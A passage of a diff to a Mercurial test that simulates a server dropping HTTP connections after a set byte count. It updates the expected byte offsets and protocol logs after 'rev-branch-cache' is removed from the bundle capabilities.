bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob) + readline(*) -> (440) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob) readline(*) -> (61) x-hgproto-1: 0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull\r\n (glob) readline(*) -> (35) accept: application/mercurial-0.1\r\n (glob) readline(*) -> (2?) 
host: localhost:$HGPORT\r\n (glob) @@ -544,7 +544,7 @@ Server stops before it sends transfer encoding - $ hg serve --config badserver.closeaftersendbytes=973 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=954 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -573,7 +573,7 @@ Server sends empty HTTP body for getbundle - $ hg serve --config badserver.closeaftersendbytes=978 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=959 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -591,17 +591,17 @@ readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob) readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(*) -> (2) \r\n (glob) - sendall(160 from 160) -> (818) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) - sendall(450 from 450) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) - write(160 from 160) -> (818) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !) - write(450 from 450) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) - write(36 from 36) -> (942) HTTP/1.1 200 Script output follows\r\n (no-py3 !) 
- write(23 from 23) -> (919) Server: badhttpserver\r\n (no-py3 !) - write(37 from 37) -> (882) Date: $HTTP_DATE$\r\n (no-py3 !) - write(41 from 41) -> (841) Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21 from 21) -> (820) Content-Length: 450\r\n (no-py3 !) - write(2 from 2) -> (818) \r\n (no-py3 !) - write(450 from 450) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + sendall(160 from 160) -> (799) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) + sendall(431 from 431) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) + write(160 from 160) -> (818) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) + write(431 from 431) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) + write(36 from 36) -> (923) HTTP/1.1 200 Script output follows\r\n (no-py3 !) + write(23 from 23) -> (900) Server: badhttpserver\r\n (no-py3 !) + write(37 from 37) -> (863) Date: $HTTP_DATE$\r\n (no-py3 !) + write(41 from 41) -> (822) Content-Type: application/mercurial-0.1\r\n (no-py3 !) + write(21 from 21) -> (801) Content-Length: 431\r\n (no-py3 !) + write(2 from 2) -> (799) \r\n (no-py3 !) 
+ write(431 from 431) -> (368) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) readline(65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) @@ -625,7 +625,7 @@ readline(65537) -> (30) GET /?cmd=getbundle HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) - readline(*) -> (461) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob) + readline(*) -> (440) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob) readline(*) -> (61) x-hgproto-1: 0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull\r\n (glob) readline(*) -> (35) accept: application/mercurial-0.1\r\n (glob) readline(*) -> (2?) 
host: localhost:$HGPORT\r\n (glob) @@ -651,7 +651,7 @@ Server sends partial compression string - $ hg serve --config badserver.closeaftersendbytes=1002 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=983 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -669,17 +669,17 @@ readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob) readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(*) -> (2) \r\n (glob) - sendall(160 from 160) -> (842) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) - sendall(450 from 450) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) - write(160 from 160) -> (842) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !) - write(450 from 450) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) - write(36 from 36) -> (966) HTTP/1.1 200 Script output follows\r\n (no-py3 !) - write(23 from 23) -> (943) Server: badhttpserver\r\n (no-py3 !) - write(37 from 37) -> (906) Date: $HTTP_DATE$\r\n (no-py3 !) - write(41 from 41) -> (865) Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21 from 21) -> (844) Content-Length: 450\r\n (no-py3 !) - write(2 from 2) -> (842) \r\n (no-py3 !) 
- write(450 from 450) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + sendall(160 from 160) -> (823) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) + sendall(431 from 431) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) + write(160 from 160) -> (842) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) + write(431 from 431) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) + write(36 from 36) -> (947) HTTP/1.1 200 Script output follows\r\n (no-py3 !) + write(23 from 23) -> (924) Server: badhttpserver\r\n (no-py3 !) + write(37 from 37) -> (887) Date: $HTTP_DATE$\r\n (no-py3 !) + write(41 from 41) -> (846) Content-Type: application/mercurial-0.1\r\n (no-py3 !) + write(21 from 21) -> (825) Content-Length: 431\r\n (no-py3 !) + write(2 from 2) -> (823) \r\n (no-py3 !) + write(431 from 431) -> (392) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) 
readline(65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) @@ -702,7 +702,7 @@ readline(65537) -> (30) GET /?cmd=getbundle HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) - readline(*) -> (461) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob) + readline(*) -> (440) x-hgarg-1: bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=96ee1d7354c4ad7372047672c36a1f561e3a6a4c&listkeys=phases%2Cbookmarks\r\n (glob) readline(*) -> (61) x-hgproto-1: 0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull\r\n (glob) readline(*) -> (35) accept: application/mercurial-0.1\r\n (glob) readline(*) -> (2?) 
host: localhost:$HGPORT\r\n (glob) @@ -733,7 +733,7 @@ Server sends partial bundle2 header magic - $ hg serve --config badserver.closeaftersendbytes=999 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=980 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -778,7 +778,7 @@ Server sends incomplete bundle2 stream params length - $ hg serve --config badserver.closeaftersendbytes=1008 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=989 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -825,7 +825,7 @@ Servers stops after bundle2 stream params header - $ hg serve --config badserver.closeaftersendbytes=1011 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=992 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -871,7 +871,7 @@ Server stops sending after bundle2 part header length - $ hg serve --config badserver.closeaftersendbytes=1020 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=1001 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -920,7 +920,7 @@ Server stops sending after bundle2 part header - $ hg serve --config badserver.closeaftersendbytes=1067 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=1048 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -973,7 +973,7 @@ Server stops after bundle2 part payload chunk size - $ hg serve --config badserver.closeaftersendbytes=1088 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=1069 -p $HGPORT -d 
--pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -1029,7 +1029,7 @@ Server stops sending in middle of bundle2 payload chunk - $ hg serve --config badserver.closeaftersendbytes=1549 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=1530 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -1086,7 +1086,7 @@ Server stops sending after 0 length payload chunk size - $ hg serve --config badserver.closeaftersendbytes=1580 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=1561 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -1148,8 +1148,7 @@ Server stops sending after 0 part bundle part header (indicating end of bundle2 payload) This is before the 0 size chunked transfer part that signals end of HTTP response. -# $ hg serve --config badserver.closeaftersendbytes=1755 -p $HGPORT -d --pid-file=hg.pid -E error.log - $ hg serve --config badserver.closeaftersendbytes=1862 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=1736 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -1165,25 +1164,20 @@ $ killdaemons.py $DAEMON_PIDS #if py36 - $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -25 - sendall(9 from 9) -> (851) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (842) 4\\r\\n\x00\x00\x00)\\r\\n (esc) - sendall(47 from 47) -> (795) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc) - sendall(9 from 9) -> (786) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) - sendall(473 from 473) -> (313) 
1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (304) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (295) 4\\r\\n\x00\x00\x00 \\r\\n (esc) - sendall(38 from 38) -> (257) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) - sendall(9 from 9) -> (248) 4\\r\\n\x00\x00\x00:\\r\\n (esc) - sendall(64 from 64) -> (184) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n - sendall(9 from 9) -> (175) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (166) 4\\r\\n\x00\x00\x00#\\r\\n (esc) - sendall(41 from 41) -> (125) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 
namespacebookmarks\\r\\n (esc) - sendall(9 from 9) -> (116) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (107) 4\\r\\n\x00\x00\x00\x1d\\r\\n (esc) - sendall(35 from 35) -> (72) 1d\\r\\n\x16cache:rev-branch-cache\x00\x00\x00\x03\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (63) 4\\r\\n\x00\x00\x00'\\r\\n (esc) - sendall(45 from 45) -> (18) 27\\r\\n\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00default\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\\r\\n (esc) + $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -20 + sendall(9 from 9) -> (744) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (735) 4\\r\\n\x00\x00\x00)\\r\\n (esc) + sendall(47 from 47) -> (688) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc) + sendall(9 from 9) -> (679) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) + sendall(473 from 473) -> (206) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 
0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (197) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (188) 4\\r\\n\x00\x00\x00 \\r\\n (esc) + sendall(38 from 38) -> (150) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) + sendall(9 from 9) -> (141) 4\\r\\n\x00\x00\x00:\\r\\n (esc) + sendall(64 from 64) -> (77) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n + sendall(9 from 9) -> (68) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (59) 4\\r\\n\x00\x00\x00#\\r\\n (esc) + sendall(41 from 41) -> (18) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc) sendall(9 from 9) -> (9) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) sendall(9 from 9) -> (0) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) write limit reached; closing socket @@ -1193,25 +1187,20 @@ #else - $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -26 - write(9 from 9) -> (851) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (842) 4\\r\\n\x00\x00\x00)\\r\\n (esc) - write(47 from 47) -> (795) 
29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc) - write(9 from 9) -> (786) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) - write(473 from 473) -> (313) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (304) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (295) 4\\r\\n\x00\x00\x00 \\r\\n (esc) - write(38 from 38) -> (257) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) - write(9 from 9) -> (248) 4\\r\\n\x00\x00\x00:\\r\\n (esc) - write(64 from 64) -> (184) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n - write(9 from 9) -> (175) 
4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (166) 4\\r\\n\x00\x00\x00#\\r\\n (esc) - write(41 from 41) -> (125) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc) - write(9 from 9) -> (116) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (107) 4\\r\\n\x00\x00\x00\x1d\\r\\n (esc) - write(35 from 35) -> (72) 1d\\r\\n\x16cache:rev-branch-cache\x00\x00\x00\x03\x00\x00\\r\\n (esc) - write(9 from 9) -> (63) 4\\r\\n\x00\x00\x00'\\r\\n (esc) - write(45 from 45) -> (18) 27\\r\\n\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00default\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\\r\\n (esc) + $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -21 + write(9 from 9) -> (744) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (735) 4\\r\\n\x00\x00\x00)\\r\\n (esc) + write(47 from 47) -> (688) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 